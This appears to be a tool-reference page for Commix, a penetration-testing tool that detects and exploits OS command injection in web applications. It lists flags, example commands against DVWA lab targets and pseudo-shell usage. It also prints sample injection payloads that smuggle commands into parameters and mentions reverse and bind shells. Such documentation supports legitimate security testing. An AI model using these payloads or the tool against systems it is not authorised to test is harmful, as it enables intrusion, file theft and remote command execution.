Web Application Analysiscommand injectionos command injectionexploitationweb vulnerabilitypenetration testing

Commix

Automated all-in-one OS command injection and exploitation tool for detecting and exploiting command injection vulnerabilities in web applications.

Description

Commix (short for [comm]and [i]njection e[x]ploiter) is designed for web developers, penetration testers, and security researchers to test web applications for command injection vulnerabilities. It automates the detection and exploitation of command injection bugs, errors, or flaws in vulnerable parameters or strings. Written in Python, it provides a simple environment to identify and exploit these security issues efficiently.

The tool supports various injection techniques including classic, time-based, blind, and results-based methods. It can test parameters in URLs, POST data, HTTP headers like Referer and User-Agent, and cookies. Once a vulnerability is found, commix offers a pseudo-terminal shell for interactive command execution on the target system.

Use cases include security assessments of web applications to find OS command injection flaws, automated vulnerability scanning, and post-exploitation activities through gained shell access.

How It Works

Commix tests web parameters and HTTP headers for command injection vulnerabilities using multiple techniques: results-based classic injection, time-based blind injection, dynamic code evaluation, and tempfile-based semi-blind injection. It sends payloads like ';echo KSXTLU$((18+64))$(echo KSXTLU)KSXTLU' or Windows-specific '%26 for /f "delims=" %i in ('cmd /c "set /a (49+1)"') do @set /p = AWMZVA%iAWMZVAAWMZVA' to detect injectable points. Upon success, it provides an os_shell for command execution, supporting enumeration (--current-user, --sys-info), file access (--file-read, --file-write), and shell options like reverse_tcp/bind_tcp.

Installation

bash

sudo apt install commix

Flags

--url=URLTarget URL

--data=DATAData string to be sent through POST

--cookie=COOKIEHTTP Cookie header

--level=LEVELLevel of tests to perform (1-3, Default: 1)

--current-userRetrieve current user name

--hostnameRetrieve current hostname

--is-rootCheck if the current user have root privileges

--sys-infoRetrieve system information

--file-read=FILERead a file from the target host

--file-write=FILEWrite to a file on the target host

Examples

Test POST parameter 'ip' for command injection vulnerability with cookie authentication

commix --url http://192.168.20.12/dvwa/vulnerabilities/exec/ --cookie='PHPSESSID=cj645co26lgve7ro1kc9dvt3a0; security=low' --data='ip=INJECT_HERE&Submit=Submit'

Exploit referer header vulnerability using highest testing level (level 3)

commix --url="http://192.168.0.23/commix-testbed/scenarios/referer/referer(classic).php" --level=3

Basic URL exploitation with cookie, automatically detects Windows OS and provides os_shell

commix --url http://192.168.20.12/dvwa/vulnerabilities/exec/ --cookie='PHPSESSID=cj645co26lgve7ro1kc9dvt3a0; security=low'

Execute 'whoami' command in the pseudo-terminal os_shell after successful injection

commix(os_shell) > whoami

Execute 'id' command in os_shell to check current user privileges on Unix target

commix(os_shell) > id

Execute 'ls' command in os_shell to list directory contents

commix(os_shell) > ls

Show help and all available options

commix -h

Updated 2026-04-16kali.org ↗